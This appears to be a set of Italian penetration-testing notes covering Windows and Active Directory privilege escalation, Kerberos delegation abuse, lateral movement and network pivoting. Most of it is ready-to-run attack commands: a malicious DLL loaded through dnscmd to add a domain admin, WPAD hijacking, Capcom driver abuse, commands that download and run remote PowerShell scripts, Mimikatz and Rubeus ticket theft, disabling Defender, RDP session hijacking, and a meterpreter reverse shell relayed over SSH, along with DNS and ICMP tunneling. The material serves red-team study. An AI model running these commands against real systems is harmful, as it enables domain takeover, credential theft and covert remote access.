msfvenom -p windows/x64/exec cmd='net group "domain admins" <nome utente> /add /domain' -f dll -o <nome dll>.dll #comando di msfvenom che genera un dll malevola con al suo interno un comando CMD per aggiungere un utente al gruppo domain admins e che verrà utilizzata per essere injectata nella configurazione del dns target

La dll malevola va spostata nella macchina target

dnscmd.exe /config /serverlevelplugindll <full path dll malevola>.dll #comando che tramite l'eseguibile dnscmd cambie le impostazioni dns andando ad inserire la dll malevola come plugin server

N.B: il comando di sopra può essere lanciato solo da membri del gruppo DnsAdmins

Ora dobbiamo stoppare e riavviare il servizio dns ma per farlo prima bisogna controllare se abbiamo i permessi per farlo

wmic useraccount where name="<nome utente>" get sid #comand CMD che recuperare il nostro SID, questo servirà per vedere se il SID ha i permessi necessari per il servizio

sc.exe sdshow dns #comando che mostra il security descriptor(SID) del servizio DNS, nell'output dovrà comparire il sid del nostro utente con i dovuti permessi

sc stop dns
sc start dns #comandi per fermare e poi riavviare il servizio dns

Ora fare il logoff per applicare le modifiche e poi rientrare

net localgroup "domain admins" #comando che lista i membri del gruppo, di cui il nostro utente farà parte

Infine se vogliamo ripulire il tutto dopo aver fatto

reg delete \HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters  /v ServerLevelPluginDll #comando per eliminare le tracce della modifica

sc stop dns
sc start dns #comandi che stoppano e avviano il servizio dns per applicare le nuove modifiche

• WPAD record:

WPAD record (Web Proxy Auto-Discovery), è un record all'interno dell'AD che permette ai dispostivi di trovare automaticamente il server proxy; il gruppo "DnsAdmins" permette di configurare la "lista globale di blocco delle query del server DNS", una lista dove troviamo bloccati anche i WPAD record; l'attacco consiste nel disattivare la lista globale e poi aggiungere una WPAD record che punti al nostro pc dove avremmo avviato responder in ascolto delle macchine vittime che hanno l'impostazione WPAD attiva

Comandi:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <nome server dns> #comando per disattivare le global query su una determinata macchina

Add-DnsServerResourceRecordA -Name wpad -ZoneName <nome zona> -ComputerName <nome server dns> -IPv4Address <ip macchina> #comando per aggiungere il WPAD record

4. Hyper-V Administrators:

E' il gruppo che ha il controllo totale sulle funzioni dell'Hyper-V, questo gruppo tramite questo script ci permetterà di diventare SYSTEM

5. Print Operators:

Il gruppo print operators tramite il privilegio "SeLoadDriverPrivilege", permette i diritti di accedere, modificare e eliminare tutte i printers collegate ad un Domain Controller

Comandi:

whoami /priv #comando per listare i nostri permessi

Potremmo notare che il privilegio SeLoadDriverPrivilege sarà disattivato, il primo passo è di utilizzare seguente script

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h" #include che vanno aggiunti al codice dello script

cl /DUNICODE /D_UNICODE <nome file script>.cpp #comando per compilare lo script, in questo caso viene utilizzato cl.exe di Visual Studio

Il secondo passo è di abusare del driver "Capcom.sys", il seguente driver permette ad ogni utente di eseguire shellcode con privilegi di SYSTEM

N.B: il driver se non presente va scaricato e passato alla target machine

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\<path del driver>" #comando che aggiunge una subkey ImagePath al driver vulnerabile
#la notazione \??\ è una notazione interna che dice di interpretarla in questa maniera C:\<path driver>

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 #comando che aggiunge una subkey di nome type e la setta a 1

Terzo passo, utilizzare lo script caricato in precedenza, attivare il privilegio e controllare se il driver è stato caricato, per visionare il driver utilizziamo il seguente tool

.\<nome script>.exe #comando che avvia l'eseguibile per attivare il privilegio SeLoadDriverPrivilege

.\DriverView.exe #comando che avvia il tool per vedere i driver

.\DriverView.exe /stext <nome file>.txt
cat <nome file>.txt | Select-String -pattern Capcom #comandi powershell che possono semplificare la ricerca

Infine con il seguente script che va compilato potremmo ottenere una shell con privilegi SYSTEM

.\ExploitCapcom.exe #comando per avviare l'eseguibile

reg delete HKCU\System\CurrentControlSet\Capcom #comando per ripulire le chiavi di registro

N.B: Capita che non si disponga di GUI per utilizzare ExploitCapcom, in questo caso alla linea 292 "TCHAR CommandLine[] = "<comando_da_cambiare>");" del codice invece di creare una shell in locale possiamo fargli aprire un'eseguibile con all'interno una revshell che punti alla nostra macchina

Esiste come al solito un tool che automatizza i passi svolti sopra è chiamato EopLoadDriver

6. Server Operators:

Il gruppo Server Operators permette di amministrare un windows server senza la necessità dei privilegi di domain admin, in questo gruppo ritroviamo i 2 privilegi "SeBackup" e "SeRestore"

Comandi:

sc qc <nome servizio> #comando che fa una query ad un servizio

converrebbe a noi di cercare un servizio che sia avviato dall'account "SYSTEM" e possiamo vedere i permessi con un'utility chiamata PsService della suite sysinternal-processi

.\PsService.exe security <nome servizio> #comando per ottenere informazioni sul servizio, rispetto a sc ci fornisce maggiore output

N.B: le stesse informazioni possono essere ottenute dal comando "sc", l'utility "PsService" può risultare più veloce nel pratico

Una volta trovato il servizio dove il nostro gruppo ha come privilegi "all", cambiamo il "binary path name"

sc config <nome servizio> binPath= "cmd /c net localgroup Administrators <nome utente> /add" #comando che cambia il binary path name di un servizio con un comando CMD che aggiunge un nostro utente al gruppo degli Administrators

Ora da qui in poi possiamo accedere al domain controller come parte del gruppo amministratore

• ClipBoard Logger:

Fonte di informazioni può essere il copia e incolla continuo di un utente

Comandi:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1') #comando per runnare lo script direttamente in memoria

Invoke-ClipboardLogger #comando per avviare lo script

• SQLAdmin:

il diritto SQLAdmin permette di amministrare le istanze SQL e se abbiamo le corrette credenziali di chi possiede il diritto possiamo utilizzarlo

N.B: le istanze di mysql sono utilizzate in una tecnica di persistence visionabile qui

1. PowerUpSQL:

PowerUpSQL script in .ps1 che permette di interagire con l'istanza del db

Comandi:

Import-Module .\PowerUpSQL.ps1 #comando per importare il modulo

Get-SQLInstanceDomain #comando che recupera informazioni sulle istanze di SQL

Get-SQLQuery -Verbose -Instance "<ip target>,<porta>" -username "<dominio>\<utente>" -password "<password>" -query '<query>' #comando che tramite autenticazione esegue una query

2. mssqlclient.py:

La suite Impacket tramite lo script mssqlclient.py permette di interagire con il db

• Kerberos Delegation:

Le kerberos delegation permettono ad un servizio o applicazione di utilizzare le proprie credenziali kerberos a nome di un altro utente, esistono 3 tipi di delegation: Unconstrained Delegation, Constrained Delegation e Resource-based Delegation

1. Unconstrained Delegation = il più permissivo permette ad un servizio o applicazione di presentare le proprie credenziali (TGT) o quelle di un utente che ha loggato a chiunque altro servizio, applicativo e ecc...

2. Constrained Delegation = meno permissivo perchè al servizio o applicazione viene specificato solo a quali altri poter dare le proprie credenziali kerberos

3. Resource-based Delegation = in questo caso le policy di delegazione sono all'interno della risorsa stessa (servizio, computer, applicazione) e specificherà chi può presentare le credenziali kerberos

N.B: Esistono account che hanno la voce l'account è sensibile e non può essere delegato o fanno parte del gruppo degli utenti protetti, in cui le kerberos delegations non funzionano

Unconstrained e Constrained delegation:

Il primo passo è enumerare il sistema per vedere eventuali delegazione e sono due le casistiche:

1. Trovarsi all'interno della rete target con una macchina windows e possiamo enumerare tramite comandi powershell:

Get-ADUser -Identity <nome utente> -Properties msDS-AllowedToDelegateTo #comando powershell per enumerare le delegations degli utenti

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description #comando powershell per enumerare le delegations del gruppo domain computers

Tramite pure il tool PowerView:

Import-Module .\PowerView.ps1 #comando per importare powerview

Get-NetUser -TrustedToAuth #comando powerview per vedere le delegations degli utenti

Get-DomainComputer -TrustedToAuth #comando powerview per vedere le delegations dei domain computers

2. Trovarsi all'interno della rete target con una macchina linux, possiamo utilizzare uno dei tanti script della suite Impacket:

findDelegation.py <dominio>/<nome utente>:<password> #comando della suite impacket per recupare le delegation

• Unconstrained:

Sono due i metodi che permettono di recuperare il TGT:

1. Mimikatz:

privilege::debug
sekurlsa::tickets /export
kerberos::list /export

N.B: Non scordatevi anche di mimikatz in powershell

2. Rubeus

Rubeus.exe triage #comando che testa per eventuali ticket

Rubeus.exe dump /nowrap /user:<nome utente> #comando che esperto il TGT per un utente specifico

Rubeus.exe monitor interval:10 /nowrap #comando che ogni 10 secondi monitora per un login

N.B: Anche in questo caso è disponibile Rubeus scritto in powershell disponibile a questo link

Autenticazione forzata:

Quando si ha la possibilità di compromettere un macchina che possiede unconstrained delegation si ha allo stesso l'occassione di poter ottenere ulteriori TGT tramite l'autenticazione forzata di host e server tramite il Printerbug

PrinterBug: Un bug che sfrutta il protocollo RPC e tramite una chiamata permette di poter attivare il servizio

Steps:

I) Controllare che il servizio di Print Spooler sia presente:

rpcdump.py -port 135 <ip> | grep -A 6 "spoolsv"

II) Utiliziamo 2 comandi di powerview per recuperare i computer e i server all'interno dell'AD:

Get-DomainComputer -Properties DnsHostName,OperatingSystem | Where {$_.OperatingSystem -Notlike "*server*"} | Select DnsHostname | Out-File Computers.txt -Encoding "ASCII"
Get-DomainComputer -Properties DnsHostName,OperatingSystem | Where {$_.OperatingSystem -like "*server*"} | Select DnsHostname | Out-File Servers.txt -Encoding "ASCII"

III) Controlliamo che i computer e i server siano vulnerabili tramite lo script in powsershell Get-SpoolStatus

Get-SpoolStatus ForEach ($Computer in Get-Content Computers.txt) {Get-SpoolStatus $Computer}
Get-SpoolStatus ForEach ($Server in Get-Content Servers.txt) {Get-SpoolStatus $Server}

IV) Mettiamo in ascolto Rubeus e forziamo l'autenticazione tramite lo script in powershell

Rubeus.exe monitor /Interval:5 /nowrap

Invoke-Expression (iwr -UseBasicParsing https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Spoolsample.ps1)
Invoke-SpoolSample -Command "<computer o server target> <host compromesso>"

• Constrained:

Esistono due estensione aggiuntive nel kerberos che aiutano a capire meglio lo sfruttamento delle delegations:

Abbiamo poi inoltre da capire che la constrained delegation può essere impostata con due voci With Protocol Transition o Without Protocol Transition, la differenza sostanziale è che il secondo complica leggermente il procedimento di sfruttamento della delegation non permettondici di poter utilizzare il nostro TGT con S4U2self al fine di utilizzarlo con S4U2proxy ma esiste un'alternativa comunque

Steps:

I) Utilizzando Rubeus possiamo impersonare altri utenti avendo credenziali valide

Rubeus.exe s4u /nowrap /msdsspn:<cifs/target> /impersonateuser:<utente da impersonare> /domain:<dominio> /user:<nome utente compormesso> /password:<password utente compromesso

II) Esiste anche un alternativa tramite la suite Impacket:

getST.py -spn <cifs/target> -dc-ip <ip DC> -impersonate <nome utente da impersonare> <dominio>/<nome utente>:<password>

N.B: Ricorda esiste pure Invoke-Rubeus

• Resource-based Delegation:

Anche in questo caso il primo passo è dover enumerare la presenza della delegation:

Get-DomainObject -Identity "<DN del dominio>" -Domain <dominio> | select MachineAccountQuota

Steps:

/TO-DO/

• Disattivare Defender:

Defender stesso può mettere i bastoni tra le ruote ma con i dovuti permessi possiamo disattivarlo

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend #comando completo per disattivare defender

• Mitm:

sudo python3 mitm6.py -i <interfaccia di rete> -d <nome dominio target> #tool utilizzato per il man in the middle in ipv6

• Winpeas = tool molto potente per cercare possibili privesc

• PrivescCheck = alternativa a Winpeas se non si vuole eseguire un file binario

• Wesng = python script meno rumoroso rispetto a winpeas

N.B prima di startare wesng utilizzare il comando "wes.py --update" per aggiornare il db, poi runnare il comando "systeminfo" ed infine per avviare lo script utilizzare il seguente comando "wes.py systeminfo.txt"

• SharpUp

Allegato qui è possibile trovare il link ad un repo contenente alcuni "LOLBAS"(Living Off The Land Binaries)

Le tecniche di Lateral Movements permettono di approfondire la conoscenza della rete target muovendosi da a macchina a macchina

• Psexec64:

Il tool psexec64.exe (integrato nella suite sysinternal di windows), permette di poter lanciare comandi da remoto, richiede di far parte degli Administrator group o avere dei poteri d'amministratore

Comandi:

psexec64.exe \\<ip macchina> -u <user> -p <password> -i <commando> #comando per lanciare da remoto, i doppi backslash sono per quando utilizzamo SMB sennò basta mettere un semplice indirizzo ip

• Winexe:

Winexe può risultare un'alternativa a Psexec molto valida in quanto si ha la possibilità di lanciare comandi da remoto dalla nostra machine senza dover caricare nulla sulla macchina vittima

winexe -U '<username>%<password>' //<ip_bersaglio> <comando da remoto> #comando che esegue processi da remoto sfruttando SMB

• WinRM:

WinRm permette di poter utilizzare una shell o lanciare comandi powershell sempre da remoto, il gruppo richiesto è quello dei Remote Managemnet Users:

Comandi:

$username = '<user>';
$password = '<passowrd>';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; #comando per creare l'oggetto PSSCredential

Enter-PSSession -Computername <ip> -Credential $credential #comando per entrate nella sessione

Invoke-Command -Computername <ip> -Credential $credential -ScriptBlock {whoami} #comando per lanciare altri comandi da remoto

• SC.exe:

sc.exe permette di creare processi da remoto, si interfaccia con il Service Control Manager e lo fa tramite RPC e EPM:

Comandi:

sc.exe \\<ip> create <nome servizio> binPath= "<path binario>" #comando per creare il servizio

sc.exe \\<ip> start <nome servizio> #comando per startarlo

sc.exe \\<ip> stop <nome servizio> #comando per stopparlo

sc.exe \\<ip> delete <nome servizio> #comando per eliminarlo

• Task scheduler:

Tramite schtasks possiamo creare dei tasks da remoto o anche da locale che in un determinato tempo si ripetono o meno, gruppo richiesto Administrators group o avere dei privilegi

Comandi:

schtasks /s <ip> /RU "SYSTEM" /create /tn "<nome task>" /tr "<comando>" /sc ONCE /sd 01/01/1970 /st 00:00 #comando per creare un taks con diversi parametri

schtasks /s <ip> /run /TN "<nome task>" #comando per avviarlo

schtasks /S <ip> /TN "<nome task>" /DELETE /F #comando per eliminarlo

Comandi che possiamo eseguire sulla machine target:

schtasks /create /sc onlogon /tn "TempCleaner" /ru SYSTEM /tr \Appdata\Local\Virtualstore\taskevents.exe #comando che ad ogni logon ritorna una shell come system

• WMI:

WMI(Windows Management Instrumentation) è utilizzato per la gestione delle risorse locali e di rete, possiamo persino creare processi, servizi e schedule tasks e fa tutto questo da remoto tramite 2 protocolli DCOM o Wsman (WinRM)

N.B: Gruppo richiesto Administrators group

Porte 135, 49152-65535 (MSRPC)

5985/TCP (WinRM HTTP) o 5986/TCP (WinRM HTTPS)

Comandi per creare una sessione:

$username = '<user>';
$password = '<passowrd>';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; #comando per creare l'oggetto PSSCredential

$Opt = New-CimSessionOption -Protocol DCOM #comando che crea un oggetto CIM in cui è specificato il protocollo DCOM 
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop #comando che crea la sessione CMI
#CMI è strettamente correlato con WMI

Comandi per creare un processo da remoto:

$Command = "<comando da inserire>"; #variabile contente il processo

ES: powershell.exe -Command Set-Content -Path C:\Windows\hello.txt -Value hello

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $Command} #comando per creare il processo

wmic.exe /user:<nome utente> /password:<password> /node:<ip> process call create <comando>" #stesso comando ma per CMD

Comandi per creare un servizio da remoto:

Invoke-CimMethod -CimSession <sessione> -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "<nome servizio";
DisplayName = "<nome>";
PathName = "<comando>";
ServiceType = [byte]::Parse("16"); # Win32OwnProces
StartMode = "Manual"
} #comando con relativi dettagli per creare un servizio

$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE <nome>'" #variabile che contiene informazioni per creare 
l'handle del servizio

Invoke-CimMethod -InputObject $Service -MethodName StartService/StopService/Delete #comando che preso l'handle, avvia/ferma/elimina il servizio

Comandi per creare un task da remoto:

$Command = "<comando o eseguibile>" 
$Args = "<argomenti del comando>" #commando e argomenti vanno divisi e inseriti in variabili d'ambiente

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args #comando per la creazione dell'azione nello schedule

Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "<nome task>" #comando per la registrazione del task

Start-ScheduledTask -CimSession $Session -TaskName "<nome task>" #comando che avvia il task

Unregister-ScheduledTask -CimSession $Session -TaskName "<nome task>" #comando per eliminarlo

Comandi per installare un nostro MSI installer:

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "<path installer>"; Options = ""; AllUsers = $false} #comando per installare un nostro MSI

wmic /node:<ip> /user:<eventuale dominio>\<utente> product call install PackageLocation=<Path installer> #stesso comando ma per CMD

• RDP hijacking:

RDP hijacking funziona se vi è una connessione RDP dove è chiusa e non è stato fatto il logout e quindi solo con il reboot del server si potrà chiudere definitivamente, funziona sulle versioni di windows server 2016, nella 2019 richiede la password.

Comandi:

#runnato con privilegi di SYSTEM
query user #query delle sessioni attive, se nell'output notiamo una sessione in state DISC significa che è vulnerabile

OUPUT di esempio:

USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
administrator         rdp-tcp#6           3  Active          .  6/3/2023 5:09 AM
serverAdmin                               4  Disc            .  6/7/2023 7:51 AM

tscon 4 /dest:rdp-tcp#6 #comando per dire di legare la sessione di ID 4 alla nostra che è la 3

• Winrs:

Utilizzando il comando winrs che sfrutta il protocollo Windows remote Management di winrm, permette di eseguire comandi da remoto tra macchine windows evitando di utilizzare "PSRemoting"

winrs /r:<server> /domain:<dominio> /username:<nome utente> /password:<password> /noecho /noprofile #comando per connettersi da remoto tramite winrs

• DCOM:

Teoria del DCOM

Comandi:

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<ip remoto>")) #comando per stabiliare la connessione con l'ip remoto

$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c echo ciao > C:\esempio.txt","7") #comando esempio per creare un file di testo sulla macchina remota

ls \\<ip remoto>\C$ #comando per vedere se il file è stato creato

Tramite tecniche di port forwarding è possibile fare pivoting tra le macchine

1. SSH Tunneling:

• Remote port Forwarding:

N.B: I comandi ssh utilizzati vengono lanciati da un'ipotetica macchina compromessa verso varie macchine target.

Comandi:

useradd <nome user> -m -d <path directory user> -s <shell da utilizzare> #comando per creare un utente sulla macchina compromessa che verrà utilizzato per la connessione SSH con le altre macchine target

passwd <password> #comando per impostare password

ssh <nome utente>@<ip> -R <porta aperta della propria machine>:<ip remoto>:<porta target> -N #comando che si connette alla macchina compromessa e che poi binda una porta remota con la propria porta, -N per creare solo la connessione

ES:

ssh [email protected] -R 3389:3.2.2.2:3389 -N /3389 porta RDP/

xfreerdp /v:127.0.0.1 /u:user /p:passwd123

• Local port Forwarding:

N.B: I comandi ssh utilizzati vengono lanciati da un'ipotetica macchina compromessa verso varie macchine target.

Comandi:

ssh <nome utente>@<ip> -L *:<porta della propria macchina>:<ip target>:<porta target> -N #comando che si connetta alla macchina compromessa, mettiamo in ascolto tutte le interfacce di rete disponibili e che poi binda la nostra porta con quella target remota

ssh <nome utente>@<ip> -L <porta locale>:<ip remoto>:<porta remota> <porta locale>:<ip remoto>:<porta remota> #comando per fare il local forward di più porte

netsh advfirewall firewall add rule name="<nome regola>" dir=<specifica direzione> action=<azione> protocol=<protocollo> localport=<porta> #comando per modificare le regole del firewall della nostra kali machine, a seconda del tunneling creato

ES:

ssh [email protected] -L *:80:127.0.0.1:80 -N

Ci andremo a connettere alla macchina compromessa con "[email protected]" subito dopo indichiamo di creare un socket "*.80" che ascolta su tutte le interfacce di rete disponibili alla porta 80, per poi bindarla con "127.0.0.1:80" la porta 80 della macchina vittima su cui è stato lanciato il comando SSH con il proprio indirizzo quindi quello di loopback.

netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80

Verrà creato una regola che permette connessioni in ingresso alla porta 80.

• Dynamic Forwarding con proxychains:

Dynamic forwarding locale è utilizzato come tecnica di pivoting per le reti, tutti i comandi vengono prima inviati al "Socks" locale e poi alla macchina target

Comandi:

Il primo comando si connette alla machine target e nel mentre inizializza il proxysocks all'indirizzo "127.0.0.1:9050"

ssh -D 9050 <user>@<ip> #comando per abilitare il dynamic forwarding 

tail -4 /etc/proxychains.conf #comando per vedere se proxysocks è stato settato

I seguenti comandi avviano nmap che a seconda dei parametri o comandi assegnati passano per "proxychains" e li esegue sulla macchina connessa ad SSH

proxychains nmap -v -sn <ip> #comando che runna nmap e poi tramite proxychains redirecta i comandi

proxychains nmap -v -Pn -sT <ip> #comando per runnare nmap verso una macchina windows sempre utilizzando le proxychains

proxychains nmap -iflist #comando per runnare nmap e lista le interfacce di rete disponibili

ES:

ssh -D 9050 [email protected]

proxychains nmap -v -sn 176.14.5.1-200

Senza Proxysocks non avremmo avuto la possibilità di forwardare i pacchetti di nmap per scannerizzare le subnet scritte perchè solo con una semplice connessione SSH non sarebbe stato possibile

• Metasploit e Proxychains:

Possiamo utilizzare le proxychains insieme a metasploit con la sua vasta gamme di moduli

Comandi:

proxychains msfconsole #comando per avviare msfconsole con le proxychains

• RDP e Proxychains:

Abbiamo la possibilità di connettersi con RDP passando sempre per le proxychains, quindi per esempio accedere ad una macchina che normalmente non sarebbe accessibile

Comandi:

proxychains xfreerdp /v:<ip> /u:<user> /p:<password> /dynamic-resolution #comando per avviare una connessione RDP utilizzando le proxychains

• Shuttle via SSH:

Shuttle è uno script python che funziona solo tramite SSH, è abbastanza veloce perchè in pochi comandi prepara tutte le route table

Comandi:

sudo apt-get install sshuttle #comando per installare sshuttle

sudo sshuttle -r <nome user>@<ip> <subnet> -v # #comando che si connette ad SSH e aggiunge alle route table la subnet specificata

Questi 2 comandi hanno permesso di preparare il tutto e possiamo lanciare ulteriori comandi di esempio:

nmap -v -sV -p3389 192.168.5.23 -A -Pn

• Netsh:

Netsh (Network shell) è la shell messa a disposizione da windows per l'ordinaria amministrazione di rete di un pc windows ma nel nostro caso può essere usato a nostro vantaggio come: scoprire eventuali rotte di rete, vedere la configurazione del firewall, aggiungere proxy, ecc...

Comandi:

netsh.exe interface portproxy add <protocollo> listenport=<porta in ascolto> listenaddress=<ip in ascolto> connectport=<porta a cui connettersi> connectaddress=<ip a cui connettersi> #comando che fa il forwarding di una porta remota ad una porta in ascolto 

netsh.exe interface portproxy show <protocollo> #comando per visualizzare com'è avvenuto il forward delle porte

ES: netsh.exe interface portproxy add v4tov4 listenport=7000 listenaddress=12.122.13.13 connectport=139 connectaddress=173.14.22.22

Andando ad utilizzare il socket "12.122.13.13:7000" che ha forwardato la porta "139" alla sua "7000", potremmo visionare il servizio SMB

• Chisel:

Chisel è un tool di tunneling molto utilizzato perchè scritto nel linguaggio Go quindi ha anche un fattore di velocità a suo vantaggio, sfrutta pure lui socks

Comandi:

git clone https://github.com/jpillora/chisel.git 
cd chisel
sudo apt install gccgo-go 
go build #comandi per copiare e preparare il tool

scp chisel <nome utente>@<ip>:<path dove salvarlo> #comando per passare il binario di chisel alla macchina vittima

Chisel permette due modalità la standard dove il chisel server è la macchina vittima mentre il chisel client è la nostra macchina ma può accadere che vi sia di mezzo un firewall che blocchi le connessioni in entrata ed è per questo che chisel mette a disposizione la modalità "reverse" cioè il chisel server lo diverrà la nostra macchina mentre il chisel client lo sarà la macchina vittima

N.B: Le varie librerie Go a disposizione nelle macchine target potrebbero non essere aggiornato o del tutto mancanti, quindi va posta un po' di attenzione

Chisel standard:

chisel server -v -p <porta> --socks5 #comando che avvia il chisel server sulla macchina vittima con utilizzo di socks5 e si tiene in ascolto su una porta selezionata

chisel client -v <ip server chisel>:<porta server chisel in ascolto> socks #comando che avvia il chisel client sulla nostra macchina ed esegue la connessione

nano /etc/proxychains.conf #comando che permette la modifica del file proxychains.conf
socks5 127.0.0.1 1080 #scritta da aggiungere alla fine del file per utilizzare socks5 in quanto sia chisel client che chisel server ascoltano al socket di rete 127.0.0.1:1080

Chisel reverse:

chisel server --reverse -v -p <porta> --socks5 #comando che avvia il chisel server sulla nostra macchina con utilizzo di socks5 e si tiene in ascolto su una porta selezionata

chisel client -v <ip server chisel>:<porta server chisel in ascolto> R:socks #comando che avvia il chisel client sulla macchina vittima ed esegue la connessione

nano /etc/proxychains.conf #comando che permette la modifica del file proxychains.conf
socks5 127.0.0.1 1080 #scritta da aggiungere alla fine del file per utilizzare socks5 in quanto sia chisel client che chisel server ascoltano al socket di rete 127.0.0.1:1080

Ora tranquillamente con entrambi i metodi possiamo lanciare un comando per esempio, verso un host sotto subnet che non potevamo raggiungere prima

ES: proxychains xfreerdp /v:192.168.2.13 /u:user /p:pass #esempio di un comando che esegue una connessione RDP verso una macchina che prima non era possibile raggiungere

2. Reverse shell via forwarding:

Ottenere una revshell via forwarding consiste nel sapersi muovere con le porte in modo da poter ottenere una revshell di una macchina non accessibile dall'esterno

In questo caso verrà esaminato l'insieme del dynamic port forwarding e del remote port forwarding per ottenere una revshell, abbiamo 3 macchine una kali machine la nostra macchina, un ubuntu server di mezzo e una windows server per ottenere una revshell

Spiegazione tecnica:

kali machine con listener meterpreter su 0.0.0.0:8000---> SSH che binda la porta 8080 dell'ubuntu con la 8000 della kali machine ----> ubuntu server con porta 8080 in ascolto ----> windows server con eseguibile malevolo che se runnato punta alla porta 8080 e indirizzo del server ubuntu, il quale server tramite comando SSH binda la sua 8080 alla 8000 della kali e che alla fine ci fa ottenere la revshell

Comandi:

ssh -D 9050 <nome user>@<ip ubuntu server> #comando che si connette con SSH al ubuntu server e abilita alla kali machine i proxysocks

proxychains xfreerdp /v:<ip> /u:<user> /p:<password> /dynamic-resolution #comando per avviare una connessione RDP utilizzando le proxychains, la windows ha la porta RDP aperta

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <ip ubuntu server> -f exe -o <nome eseguibile>.exe LPORT=8080 #comando che crea l'eseguibile che punta alla porta 8080 dell'ubuntu

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 0.0.0.0; set lport 8000; exploit" #comando che crea il listener sulla kali

Ora andrà passato prima l'eseguibile all'ubuntu server e poi alla windows machine per sapere come fare andare qui per poi bindare tutte le porte con il comando SSH specifico

ssh -R <ip ubuntu server>:8080:0.0.0.0:8000 ubuntu@<ip ubuntu server> -vN #comando che si connette all'ubuntu server e binda in remote la porta 8080 dell'ubuntu server con la 8000 della kali

eseguiamo il .exe malevolo "(abbiamo la connessione RDP alla windows)" e potremo notare che al listener sarà avvenuta la connessione

3. Socat Forwarding:

Socat può essere utilizzato quando SSH non è disponibile, ed è anche molto piu "forte" in quando utilizzandolo su una macchina vittima permette di aprire un listener su una porta e nel mentre si può fare il binding con un'altra porta

N.B: Va caricato sulla macchina compromessa e può essere maggiormente rilevabile rispetto al semplice SSH. I comandi ssh utilizzati vengono lanciati dalla macchina compromessa verso le macchine target.

Comandi:

socat TCP4-LISTEN:<porta macchina compromessa>,fork TCP4:<ip target>:<porta target> #comando per bindare una porta con socat e in seguito utilizzarla

ES:

socat TCP4-LISTEN:3389,fork TCP4:3.5.4.3:3389

Andremo a bindare la porta della 3389 della macchina compromessa alla 3389 del ip specificato, per poi poterla visitare tramite browser

TCP4-LISTEN:80,fork TCP4:<ip_della_nostra_macchina>:80

Andremo a bindare la porta 80 della macchina compromessa alla 80 della nostra machine.

4. DNS Tunneling:

Il DNS tunneling sfrutta lo stesso concetto del SSH tunneling solo tramite il protocollo DNS ed ha il vantaggio di essere meno rilevabile, in quanto in una rete le richieste DNS possono essere moltissime mentre quelle SSH in minor numero

• DnsCat2:

Tool in ruby utilizzato per il DNS tunneling va settato un server sulla nostra macchina e un client sulla macchina vittima

Comandi:

git clone https://github.com/iagox86/dnscat2.git 
cd dnscat2/server/
sudo gem install bundler
bundle install #comando per copiare e rendere operativo il tool

sudo ruby dnscat2.rb --dns host=<ip della propria macchina>,port=53,domain=<dominio se c'è> --no-cache #comando che setta il server 

N.B: Ricordarsi di copiare e incollare il campo --secret dopo aver avviato il server, perchè la chiave verrà passata poi al client per l'autenticazione

git clone https://github.com/lukebaggett/dnscat2-powershell.git #comando per scaricare il .ps1 da mandare alla macchina windows target

N.B: Il .ps1 va passato alla macchina vittima per sapere come fare andare qui

Import-Module .\dnscat2.ps1 #comando che importa il modulo nella powershell 

Start-Dnscat2 -DNSserver <ip server dns> -Domain <dominio se c'è> -PreSharedSecret <chiave per l'autenticazione> -Exec <comando da eseguire> #comando che prepara il client DNS sulla macchina vittima

dnscat2> ? #comando di dnscat2 per aprire l'help

dnscat2> windows -i <num finestra creata> #comando di dnscat2 per entrare nella finestra creata con il dns tunneling

N.B: il tool ha un ritardo abbastanza sostanzioso nel mandare e ricevere i comandi

5. ICMP Tunneling con Socks:

L'ICMP tunneling consiste nel tunneling tramite un client e un server, vengono sfruttati i pacchetti ICMP. Vi è un però in questo tipo di tunneling; è possibile solo se il firewall permette di utilizzare il comando ping all'interno della rete

Comandi:

git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng
sudo apt install autoconf #installarlo se non si ha il pacchetto
sudo ./autogen.sh #comandi per costruire ptunnerl.ng

sudo ./ptunnel-ng -r<ip server> -R<port> #comando per impostare l'ICMP server sulla macchina target

sudo ./ptunnel-ng -p<ip locale> -l<porta locale> -r<ip server remoto> -R<porta remota> #comando per impostare il client sulla macchina target

ssh -p<porta locale> -l ubuntu 127.0.0.1 #comando che si connette a SSH tramite ICMP tunneling

ssh -D 9050 -p<porta locale> -l ubuntu 127.0.0.1 #comando che oltre a connettersi attiva proxysocks

